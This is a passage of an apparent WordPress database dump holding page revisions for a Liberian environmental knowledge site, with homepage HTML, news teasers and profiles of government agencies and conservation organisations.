href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 17:40:31','2021-08-17 17:40:31','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(3948,38,'2021-08-17 17:40:31','2021-08-17 17:40:31','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 17:40:31','2021-08-17 17:40:31','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(3949,38,'2021-08-17 17:40:32','2021-08-17 17:40:32','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 17:40:32','2021-08-17 17:40:32','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(3950,38,'2021-08-17 18:26:49','2021-08-17 18:26:49','','ekms_logo','','inherit','open','closed','','ekms_logo','','','2021-08-17 18:26:49','2021-08-17 18:26:49','',3800,'https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg',0,'attachment','image/jpeg',0),(3951,38,'2021-08-17 18:27:45','2021-08-17 18:27:45','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-17 18:27:45','2021-08-17 18:27:45','',3800,'https://ekmsliberia.info/3800-revision-v1/',0,'revision','',0),(3952,38,'2021-08-17 18:28:54','2021-08-17 18:28:54','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-17 18:28:54','2021-08-17 18:28:54','',3800,'https://ekmsliberia.info/3800-revision-v1/',0,'revision','',0),(3953,38,'2021-08-17 18:31:45','2021-08-17 18:31:45','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-17 18:31:45','2021-08-17 18:31:45','',3800,'https://ekmsliberia.info/3800-revision-v1/',0,'revision','',0),(3954,38,'2021-08-17 18:36:17','2021-08-17 18:36:17','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-17 18:36:17','2021-08-17 18:36:17','',3800,'https://ekmsliberia.info/3800-revision-v1/',0,'revision','',0),(3956,38,'2021-08-17 18:45:53','2021-08-17 18:45:53','The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.\n\nIntegrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.','Forestry Development Authority','','inherit','closed','closed','','1586-autosave-v1','','','2021-08-17 18:45:53','2021-08-17 18:45:53','',1586,'https://ekmsliberia.info/1586-autosave-v1/',0,'revision','',0),(3957,38,'2021-08-17 18:46:16','2021-08-17 18:46:16','The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.\r\n\r\nIntegrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2021-08-17 18:46:16','2021-08-17 18:46:16','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(3958,42,'2021-08-17 18:54:55','2021-08-17 18:54:55','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\n\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\n<h2>Featured Projects</h2>\n<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img title=\"Enhancing Resilience of Vulnerable Coastal Areas\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" sizes=\"(max-width: 1024px) 100vw, 1024px\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" width=\"1024\" height=\"530\" /></a> <a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas </a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n\n&nbsp;','Ministry of Mines and Energy','','inherit','closed','closed','','1608-autosave-v1','','','2021-08-17 18:54:55','2021-08-17 18:54:55','',1608,'https://ekmsliberia.info/1608-autosave-v1/',0,'revision','',0),(3959,42,'2021-08-17 18:59:10','2021-08-17 18:59:10','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\n<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img title=\"Enhancing Resilience of Vulnerable Coastal Areas\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" sizes=\"(max-width: 1024px) 100vw, 1024px\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" width=\"1024\" height=\"530\" /></a> <a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas </a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\r\n\r\n&nbsp;','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2021-08-17 18:59:10','2021-08-17 18:59:10','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(3961,42,'2021-08-17 20:40:56','2021-08-17 20:40:56','The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.\r\n\r\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\r\n','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2021-08-17 20:40:56','2021-08-17 20:40:56','',1602,'https://ekmsliberia.info/?p=3961',0,'revision','',0),(3962,42,'2021-08-17 20:42:36','2021-08-17 20:42:36','LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and\r\n\r\nMore specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.\r\n','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2021-08-17 20:42:36','2021-08-17 20:42:36','',1544,'https://ekmsliberia.info/?p=3962',0,'revision','',0),(3963,42,'2021-08-17 20:43:52','2021-08-17 20:43:52','Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.\r\n\r\nThe Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector — stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).\r\n','Liberia National Water, Sanitation and Hygiene - WASH Commission','','inherit','closed','closed','','2457-revision-v1','','','2021-08-17 20:43:52','2021-08-17 20:43:52','',2457,'https://ekmsliberia.info/?p=3963',0,'revision','',0),(3964,42,'2021-08-17 20:45:29','2021-08-17 20:45:29','The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\r\n\r\nIn addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.\r\n\r\nThe core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.\r\n<h4>Mandate</h4>\r\nThe Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.\r\n','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2021-08-17 20:45:29','2021-08-17 20:45:29','',1600,'https://ekmsliberia.info/?p=3964',0,'revision','',0),(3965,42,'2021-08-17 20:47:51','2021-08-17 20:47:51','<h3><strong>COMING SOON!!!!!!</strong></h3>\n','Youth Development Services (YDS)','','inherit','closed','closed','','3041-autosave-v1','','','2021-08-17 20:47:51','2021-08-17 20:47:51','',3041,'https://ekmsliberia.info/?p=3965',0,'revision','',0),(3966,42,'2021-08-17 20:48:18','2021-08-17 20:48:18','<h3><strong>COMING SOON!!!!!!</strong></h3>\r\n','Youth Development Services (YDS)','','inherit','closed','closed','','3041-revision-v1','','','2021-08-17 20:48:18','2021-08-17 20:48:18','',3041,'https://ekmsliberia.info/?p=3966',0,'revision','',0),(3967,42,'2021-08-17 20:49:53','2021-08-17 20:49:53','<h3><strong>COMING SOON!!!!!!</strong></h3>\n','Habitat for Humanity International','','inherit','closed','closed','','2964-autosave-v1','','','2021-08-17 20:49:53','2021-08-17 20:49:53','',2964,'https://ekmsliberia.info/?p=3967',0,'revision','',0),(3968,42,'2021-08-17 20:56:35','2021-08-17 20:56:35','','habitat for humanity','','inherit','open','closed','','habitat-for-humanity','','','2021-08-17 20:57:09','2021-08-17 20:57:09','',2964,'https://ekmsliberia.info/wp-content/uploads/2020/02/habitat-for-humanity.png',0,'attachment','image/png',0),(3969,42,'2021-08-17 20:57:09','2021-08-17 20:57:09','<h3><strong>COMING SOON!!!!!!</strong></h3>\r\n','Habitat for Humanity International','','inherit','closed','closed','','2964-revision-v1','','','2021-08-17 20:57:09','2021-08-17 20:57:09','',2964,'https://ekmsliberia.info/?p=3969',0,'revision','',0),(3970,42,'2021-08-17 21:01:19','2021-08-17 21:01:19','Years of research, consultations and deliberations have lead to Forum Syd extending support to civil society in Liberia. The programme focuses on supporting the growth of a donor independent civil society and pays extra attention to land rights.\n\nSupport has since 2001 been channeled from Forum Syd through sub-granting to Swedish organisations but as of 2019 direct partnerships are being formed with around 12 Liberian civil society organisations.\n\nThe question of access to land is a complex and conflict sensitive issue. Overall, about 90 percent of civil court cases in Liberia relate to land, and nearly two thirds of violent conflicts have their roots in land rights issues.\n\nAt the same time, Liberia is perceived to also hold one of the most progressive Land Rights Act in the world, one that recognises customary land rights. The Act grants people and communities equal right to ancestral land as private ownership have over the same land. Customary land constitutes roughly 70 per cent of Liberian land.\n','Forum Syd (FS) Inc.','','inherit','closed','closed','','3005-autosave-v1','','','2021-08-17 21:01:19','2021-08-17 21:01:19','',3005,'https://ekmsliberia.info/?p=3970',0,'revision','',0),(3971,42,'2021-08-17 21:03:49','2021-08-17 21:03:49','Years of research, consultations and deliberations have lead to Forum Syd extending support to civil society in Liberia. The programme focuses on supporting the growth of a donor independent civil society and pays extra attention to land rights.\r\n\r\nSupport has since 2001 been channeled from Forum Syd through sub-granting to Swedish organisations but as of 2019 direct partnerships are being formed with around 12 Liberian civil society organisations.\r\n\r\nThe question of access to land is a complex and conflict sensitive issue. Overall, about 90 percent of civil court cases in Liberia relate to land, and nearly two thirds of violent conflicts have their roots in land rights issues.\r\n\r\nAt the same time, Liberia is perceived to also hold one of the most progressive Land Rights Act in the world, one that recognises customary land rights. The Act grants people and communities equal right to ancestral land as private ownership have over the same land. Customary land constitutes roughly 70 per cent of Liberian land.\r\n','Forum Syd (FS) Inc.','','inherit','closed','closed','','3005-revision-v1','','','2021-08-17 21:03:49','2021-08-17 21:03:49','',3005,'https://ekmsliberia.info/?p=3971',0,'revision','',0),(3972,42,'2021-08-17 21:23:32','2021-08-17 21:23:32','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\r\n\r\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\r\n\r\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\r\n\r\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\r\n\r\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\r\n\r\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\r\n','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2021-08-17 21:23:32','2021-08-17 